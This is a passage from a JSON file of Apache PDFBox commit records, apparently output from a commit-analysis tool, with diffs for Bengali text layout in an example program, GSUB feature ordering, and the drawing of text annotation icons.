unicode of this is given below:", - "- * ", - "- *

    ",
    -                "-     * \\u0986\\u09ae\\u09bf  \\u0995\\u09cb\\u09a8 \\u09aa\\u09a5\\u09c7  \\u0995\\u09cd\\u09b7\\u09c0\\u09b0\\u09c7\\u09b0 \\u09b7\\u09a8\\u09cd\\u09a1  \\u09aa\\u09c1\\u09a4\\u09c1\\u09b2 \\u09b0\\u09c1\\u09aa\\u09cb  \\u0997\\u0999\\u09cd\\u0997\\u09be \\u098b\\u09b7\\u09bf",
    -                "-     * 
    ", - "- * ", - "- */", - "- private static final String BANGLA_TEXT_1 = \"\u00e0\u00a6\u0086\u00e0\u00a6\u00ae\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a7\u008b\u00e0\u00a6\u00a8 \u00e0\u00a6\u00aa\u00e0\u00a6\u00a5\u00e0\u00a7\u0087 \u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u0080\u00e0\u00a6\u00b0\u00e0\u00a7\u0087\u00e0\u00a6\u00b0 \u00e0\u00a6\u00b2\u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u008d\u00e0\u00a6\u00ae\u00e0\u00a7\u0080 \u00e0\u00a6\u00b7\u00e0\u00a6\u00a8\u00e0\u00a7\u008d\u00e0\u00a6\u00a1 \u00e0\u00a6\u00aa\u00e0\u00a7\u0081\u00e0\u00a6\u00a4\u00e0\u00a7\u0081\u00e0\u00a6\u00b2 \u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00aa\u00e0\u00a7\u008b \u00e0\u00a6\u0097\u00e0\u00a6\u0099\u00e0\u00a7\u008d\u00e0\u00a6\u0097\u00e0\u00a6\u00be \u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf\";", - "- private static final String BANGLA_TEXT_2 = \"\u00e0\u00a6\u00a6\u00e0\u00a7\u008d\u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00a4 \u00e0\u00a6\u0097\u00e0\u00a6\u00be\u00e0\u00a6\u00a2\u00e0\u00a6\u00bc \u00e0\u00a6\u00b6\u00e0\u00a7\u0087\u00e0\u00a6\u00af\u00e0\u00a6\u00bc\u00e0\u00a6\u00be\u00e0\u00a6\u00b2 \u00e0\u00a6\u0085\u00e0\u00a6\u00b2\u00e0\u00a6\u00b8 \u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u00b0 \u00e0\u00a6\u009c\u00e0\u00a7\u0081\u00e0\u00a6\u00a1\u00e0\u00a6\u00bc\u00e0\u00a7\u0087 \u00e0\u00a6\u009c\u00e0\u00a6\u00be\u00e0\u00a6\u00ae\u00e0\u00a7\u008d\u00e0\u00a6\u00aa \u00e0\u00a6\u00a7\u00e0\u00a7\u0081\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00a4 \u00e0\u00a6\u00b9\u00e0\u00a6\u00a0\u00e0\u00a6\u00be\u00e0\u00a7\u008e \u00e0\u00a6\u00ad\u00e0\u00a6\u00be\u00e0\u00a6\u0099\u00e0\u00a7\u0087\u00e0\u00a6\u00a8\u00e0\u00a6\u00bf \u00e0\u00a6\u00ae\u00e0\u00a7\u008c\u00e0\u00a6\u00b2\u00e0\u00a6\u00bf\u00e0\u00a6\u0095 \u00e0\u00a6\u0090\u00e0\u00a6\u00b6\u00e0\u00a6\u00bf \u00e0\u00a6\u00a6\u00e0\u00a7\u0088\";", - "- private static final String BANGLA_TEXT_3 = \"\u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a6\u00b2\u00e0\u00a7\u008d\u00e0\u00a6\u00b2\u00e0\u00a7\u008b\u00e0\u00a6\u00b2 \u00e0\u00a6\u00ac\u00e0\u00a7\u008d\u00e0\u00a6\u00af\u00e0\u00a6\u00be\u00e0\u00a6\u00b8 \u00e0\u00a6\u00a8\u00e0\u00a6\u00bf\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00ad\u00e0\u00a7\u009f \";", - "+ private static final int LINE_GAP = 5;", - "+ private static final String LOHIT_BENGALI_TTF = \"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\";", - "+ private static final String TEXT_SOURCE_FILE = \"/org/apache/pdfbox/resources/ttf/bengali-samples.txt\";", - "+ private static final int FONT_SIZE = 20;", - "+ private static final int MARGIN = 20;", - "@@ -68,3 +66,3 @@ public class BengaliPdfGenerationHelloWorld", - " private BengaliPdfGenerationHelloWorld()", - "- { ", - "+ {", - " }", - "@@ -86,28 +84,35 @@ public class BengaliPdfGenerationHelloWorld", - " {", - "- PDPage page1 = new PDPage();", - "- doc.addPage(page1);", - "-", - "- PDFont font = PDType0Font.load(doc, BengaliPdfGenerationHelloWorld.class", - "- .getResourceAsStream(\"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\"),", - "+ PDFont font = PDType0Font.load(doc,", - "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(LOHIT_BENGALI_TTF),", - " true);", - "+ PDRectangle rectangle = getPageSize();", - "+ float workablePageWidth = rectangle.getWidth() - 2 * MARGIN;", - "+ float workablePageHeight = rectangle.getHeight() - 2 * MARGIN;", - "+", - "+ List> pagedTexts = getReAlignedTextBasedOnPageHeight(", - "+ getReAlignedTextBasedOnPageWidth(getBengaliTextFromFile(), font,", - "+ workablePageWidth),", - "+ font, workablePageHeight);", - "- try (PDPageContentStream contents = new PDPageContentStream(doc, page1))", - "+ for (List linesForPage : pagedTexts)", - " {", - "- contents.beginText();", - "- contents.setFont(font, 12);", - "- contents.newLineAtOffset(10, 750);", - "- contents.showText(BANGLA_TEXT_1);", - "- contents.newLineAtOffset(0, -50);", - "- contents.showText(BANGLA_TEXT_2);", - "- contents.newLineAtOffset(0, -30);", - "- contents.showText(BANGLA_TEXT_3);", - "- contents.endText();", - "- ", - "- PDImageXObject pdImage = PDImageXObject", - "- .createFromFile(BengaliPdfGenerationHelloWorld.class", - "- .getResource(", - "- \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", - "- // getFile() doesn't work if there is a space in the path", - "- .toURI().getPath(), doc);", - "- contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", - "+ PDPage page = new PDPage(getPageSize());", - "+ doc.addPage(page);", - "+", - "+ try (PDPageContentStream contents = new PDPageContentStream(doc, page))", - "+ {", - "+ contents.beginText();", - "+ contents.setFont(font, FONT_SIZE);", - "+ contents.newLineAtOffset(rectangle.getLowerLeftX() + MARGIN,", - "+ rectangle.getUpperRightY() - MARGIN);", - "+", - "+ for (String line : linesForPage)", - "+ {", - "+ contents.showText(line);", - "+ contents.newLineAtOffset(0, -(FONT_SIZE + LINE_GAP));", - "+ }", - "+", - "+ contents.endText();", - "+", - "+ }", - " }", - "@@ -118,2 +123,98 @@ public class BengaliPdfGenerationHelloWorld", - "+ private static List> getReAlignedTextBasedOnPageHeight(List originalLines,", - "+ PDFont font, float workablePageHeight)", - "+ {", - "+ final float newLineHeight = font.getFontDescriptor().getFontBoundingBox().getHeight() / 1000", - "+ * FONT_SIZE + LINE_GAP;", - "+ List> realignedTexts = new ArrayList<>();", - "+ float consumedHeight = 0;", - "+ List linesInAPage = new ArrayList<>();", - "+ for (String line : originalLines)", - "+ {", - "+ if (newLineHeight + consumedHeight < workablePageHeight)", - "+ {", - "+ consumedHeight += newLineHeight;", - "+ }", - "+ else", - "+ {", - "+ consumedHeight = newLineHeight;", - "+ realignedTexts.add(linesInAPage);", - "+ linesInAPage = new ArrayList<>();", - "+ }", - "+", - "+ linesInAPage.add(line);", - "+ }", - "+ return realignedTexts;", - "+ }", - "+", - "+ private static List getReAlignedTextBasedOnPageWidth(List originalLines,", - "+ PDFont font, float workablePageWidth) throws IOException", - "+ {", - "+ List uniformlyWideTexts = new ArrayList<>();", - "+ float consumedWidth = 0;", - "+ StringBuilder sb = new StringBuilder();", - "+ for (String line : originalLines)", - "+ {", - "+ float newTokenWidth = 0;", - "+ StringTokenizer st = new StringTokenizer(line, \" \", true);", - "+ while (st.hasMoreElements())", - "+ {", - "+ String token = st.nextToken();", - "+ newTokenWidth = font.getStringWidth(token) / 1000 * FONT_SIZE;", - "+ if (newTokenWidth + consumedWidth < workablePageWidth)", - "+ {", - "+ consumedWidth += newTokenWidth;", - "+ }", - "+ else", - "+ {", - "+ // add a new text chunk", - "+ uniformlyWideTexts.add(sb.toString());", - "+ consumedWidth = newTokenWidth;", - "+ sb = new StringBuilder();", - "+ }", - "+", - "+ sb.append(token);", - "+ }", - "+", - "+ // add a new text chunk", - "+ uniformlyWideTexts.add(sb.toString());", - "+ consumedWidth = newTokenWidth;", - "+ sb = new StringBuilder();", - "+ }", - "+", - "+ return uniformlyWideTexts;", - "+ }", - "+", - "+ private static PDRectangle getPageSize()", - "+ {", - "+ return PDRectangle.A4;", - "+ }", - "+", - "+ private static List getBengaliTextFromFile() throws IOException", - "+ {", - "+ List lines = new ArrayList<>();", - "+", - "+ try (BufferedReader br = new BufferedReader(new InputStreamReader(", - "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE)));)", - "+ {", - "+ while (true)", - "+ {", - "+ String line = br.readLine();", - "+", - "+ if (line == null)", - "+ {", - "+ break;", - "+ }", - "+", - "+ if (line.startsWith(\"#\"))", - "+ {", - "+ continue;", - "+ }", - "+ lines.add(line);", - "+ }", - "+ }", - "+", - "+ return lines;", - "+ }", - "+", - " }", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "index 6eaec7b02..dd6db9410 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "@@ -116,5 +116,2 @@ public class GlyphSubstitutionDataExtractor", - "- LOG.debug(\"*********** extracting GSUB data for the feature: \"", - "- + featureRecord.getFeatureTag());", - "-", - " Map, Integer> glyphSubstitutionMap = new LinkedHashMap<>();", - "@@ -125,2 +122,7 @@ public class GlyphSubstitutionDataExtractor", - " }", - "+", - "+ LOG.debug(\"*********** extracting GSUB data for the feature: \"", - "+ + featureRecord.getFeatureTag() + \", glyphSubstitutionMap: \"", - "+ + glyphSubstitutionMap);", - "+", - " gsubData.put(featureRecord.getFeatureTag(),", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "index 396a9b549..eefaed591 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "@@ -51,3 +51,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", - "- \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", - "+ \"rphf\", \"blwf\", \"pstf\", \"half\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", - " \"psts\", \"haln\", \"calt\");" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "81931fe65d66b2dc3b43f0fcaef6c7de40ca95c1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528034291, - "hunks": 1, - "message": "PDFBOX-3353: remove wrong comment; don't skip for width = 0, this is done by drawShape that outputs an \"n\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832770 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 68a59bee0..ebd7eb35c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -73,15 +73,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // width 0 = no border", - "- // pdf_commenting_new.pdf page 3", - "- // Root/Pages/Kids/[2]/Kids/[0]/Annots/[5]/BS/W", - "- if (Float.compare(ab.width, 0) == 0)", - "- {", - "- //TODO what happens if there is a callout?", - "- //TODO skip, don't return when we know how to make text", - "- // (maybe refactor the rectangle drawing segment)", - "- return;", - "- }", - "-", - "- //TODO how to set the text color? Apparently red is the default????", - "-", - " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "add729b9226dd34d02ab3f48bffdddcacf1aa61a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525006413, - "hunks": 2, - "message": "PDFBOX-4189: force utf8 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830510 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index d98b9b3c9..8fa6c9337 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -33,2 +33,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", - " import org.apache.pdfbox.pdmodel.font.PDType0Font;", - "+import org.apache.pdfbox.util.Charsets;", - "@@ -198,3 +199,3 @@ public class BengaliPdfGenerationHelloWorld", - " try (BufferedReader br = new BufferedReader(new InputStreamReader(", - "- BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE)));)", - "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE), Charsets.UTF_8));)", - " {" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "cb82a7afef1616e3671ae8c35b0d5b14a677491b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528821312, - "hunks": 23, - "message": "PDFBOX-3353: support /Paragraph and /NewParagraph; use fixed sizes for BBox, adjust rectangle only if NoZoom isn't set, set flags if missing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833411 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 41e9a55b1..c4776034d 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -25,2 +25,3 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.pdfbox.cos.COSName;", - " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "@@ -52,2 +53,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " SUPPORTED_NAMES.add(PDAnnotationText.NAME_CIRCLE);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_PARAGRAPH);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_NEW_PARAGRAPH);", - " }", - "@@ -73,3 +76,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- //TODO Comment, Key, NewParagraph, Paragraph", - "+ //TODO Comment, Key", - "+ // BBox values:", - "+ // key 18 18", - "+ // Comment 18 18", - " return;", - "@@ -93,6 +99,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- PDRectangle rect = getRectangle();", - "- PDRectangle bbox = rect.createRetranslatedRectangle();", - "- annotation.getNormalAppearanceStream().setBBox(bbox);", - "-", - " switch (annotation.getName())", - "@@ -100,15 +102,21 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " case PDAnnotationText.NAME_NOTE:", - "- drawNote(contentStream, bbox);", - "+ drawNote(annotation, contentStream);", - " break;", - " case PDAnnotationText.NAME_CROSS:", - "- drawCross(contentStream, bbox);", - "+ drawCross(annotation, contentStream);", - " break;", - " case PDAnnotationText.NAME_CIRCLE:", - "- drawCircles(contentStream, bbox);", - "+ drawCircles(annotation, contentStream);", - " break;", - " case PDAnnotationText.NAME_INSERT:", - "- drawInsert(contentStream, bbox);", - "+ drawInsert(annotation, contentStream);", - " break;", - " case PDAnnotationText.NAME_HELP:", - "- drawHelp(contentStream, bbox);", - "+ drawHelp(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_PARAGRAPH:", - "+ drawParagraph(annotation, contentStream);", - "+ break;", - "+ case PDAnnotationText.NAME_NEW_PARAGRAPH:", - "+ drawNewParagraph(annotation, contentStream);", - " break;", - "@@ -124,6 +132,40 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ private PDRectangle adjustRectAndBBox(PDAnnotationText annotation, float width, float height)", - "+ {", - "+ // For /Note (other types have different values):", - "+ // Adobe takes the left upper bound as anchor, and adjusts the rectangle to 18 x 20.", - "+ // Observed with files 007071.pdf, 038785.pdf, 038787.pdf,", - "+ // but not with 047745.pdf p133 and 084374.pdf p48, both have the NoZoom flag.", - "+ // there the BBox is also set to fixed values, but the rectangle is left untouched.", - "+ // When no flags are there, Adobe sets /F 24 = NoZoom NoRotate.", - "+ ", - "+ PDRectangle rect = getRectangle();", - "+ PDRectangle bbox;", - "+ if (!annotation.isNoZoom())", - "+ {", - "+ rect.setUpperRightX(rect.getLowerLeftX() + width);", - "+ rect.setLowerLeftY(rect.getUpperRightY() - height);", - "+ annotation.setRectangle(rect);", - "+ }", - "+ if (!annotation.getCOSObject().containsKey(COSName.F))", - "+ {", - "+ // We set these flags because Adobe does so, but PDFBox doesn't support them when rendering.", - "+ annotation.setNoRotate(true);", - "+ annotation.setNoZoom(true);", - "+ }", - "+ bbox = new PDRectangle(width, height);", - "+ annotation.getNormalAppearanceStream().setBBox(bbox);", - "+ return bbox;", - "+ }", - "+", - "+ private void drawNote(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - " {", - "- contentStream.setLineJoinStyle(1); // get round edge the easy way", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 18, 20);", - "+ contentStream.setMiterLimit(4);", - "+", - "+ // get round edge the easy way. Adobe uses 4 lines with 4 arcs of radius 0.785 which is bigger.", - "+ contentStream.setLineJoinStyle(1);", - "+", - "+ contentStream.setLineCapStyle(0);", - " contentStream.setLineWidth(0.61f); // value from Adobe", - "@@ -141,5 +183,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawCircles(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ private void drawCircles(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - " {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", - "+", - " // strategy used by Adobe:", - "@@ -152,6 +196,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // should be a square, but who knows...", - "- float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "- float smallR = min / 20 * 6.36f;", - "- float largeR = min / 20 * 9.756f;", - "+ float smallR = 6.36f;", - "+ float largeR = 9.756f;", - "@@ -179,5 +221,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawInsert(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ private void drawInsert(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - " {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 17, 20);", - "+", - " contentStream.setMiterLimit(4);", - "@@ -192,5 +236,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawCross(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ private void drawCross(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - " {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 19, 19);", - "+", - " // should be a square, but who knows...", - "@@ -223,5 +269,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- private void drawHelp(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ private void drawHelp(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - " throws IOException", - " {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", - "+", - " float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "@@ -251,3 +299,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", - "- contentStream.transform(Matrix.getTranslateInstance(540, 375));", - "+ contentStream.transform(Matrix.getTranslateInstance(555, 375));", - "@@ -256,2 +304,80 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", - "+ addPath(contentStream, path);", - "+ contentStream.restoreGraphicsState();", - "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", - "+ private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ // Adobe first fills a white circle with CA ca 0.6, so do we", - "+ contentStream.saveGraphicsState();", - "+ contentStream.setLineWidth(1);", - "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", - "+ gs.setAlphaSourceFlag(false);", - "+ gs.setStrokingAlphaConstant(0.6f);", - "+ gs.setNonStrokingAlphaConstant(0.6f);", - "+ gs.setBlendMode(BlendMode.NORMAL);", - "+ contentStream.setGraphicsStateParameters(gs);", - "+ contentStream.setNonStrokingColor(1f);", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fill();", - "+ contentStream.restoreGraphicsState();", - "+", - "+ contentStream.saveGraphicsState();", - "+ // rescale so that \"?\" fits into circle and move \"?\" to circle center", - "+ // values gathered by trial and error", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 3, 0.001f * min / 3));", - "+ contentStream.transform(Matrix.getTranslateInstance(850, 900));", - "+", - "+ // we get the shape of an Helvetica \"?\" and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.HELVETICA.getPath(\"paragraph\");", - "+ addPath(contentStream, path);", - "+ contentStream.restoreGraphicsState();", - "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", - "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ private void drawNewParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ adjustRectAndBBox(annotation, 13, 20);", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(0);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ // small triangle (values from Adobe)", - "+ contentStream.moveTo(6.4995f, 20);", - "+ contentStream.lineTo(0.295f, 7.287f);", - "+ contentStream.lineTo(12.705f, 7.287f);", - "+ contentStream.closeAndFillAndStroke();", - "+", - "+ // rescale and translate so that \"NP\" fits below the triangle", - "+ // values gathered by trial and error", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * 4, 0.001f * 4));", - "+ contentStream.transform(Matrix.getTranslateInstance(200, 0));", - "+ addPath(contentStream, PDType1Font.HELVETICA_BOLD.getPath(\"N\"));", - "+ contentStream.transform(Matrix.getTranslateInstance(1300, 0));", - "+ addPath(contentStream, PDType1Font.HELVETICA_BOLD.getPath(\"P\"));", - "+ contentStream.fill();", - "+ }", - "+", - "+ private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException", - "+ {", - " PathIterator it = path.getPathIterator(new AffineTransform());", - "@@ -285,6 +411,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- contentStream.restoreGraphicsState();", - "- // draw the outer circle counterclockwise to fill area between circle and \"?\"", - "- drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", - "- contentStream.fillAndStroke();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "0be6ddd5256be813dcfeb66c9528f19c19fd9e4c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527300913, - "hunks": 16, - "message": "PDFBOX-3353: avoid ClassCastException, fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832288 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", - "index 8198bd4fb..077c576d9 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", - "@@ -27,3 +27,4 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - " /**", - "- * This is the class that represents a rectangular or 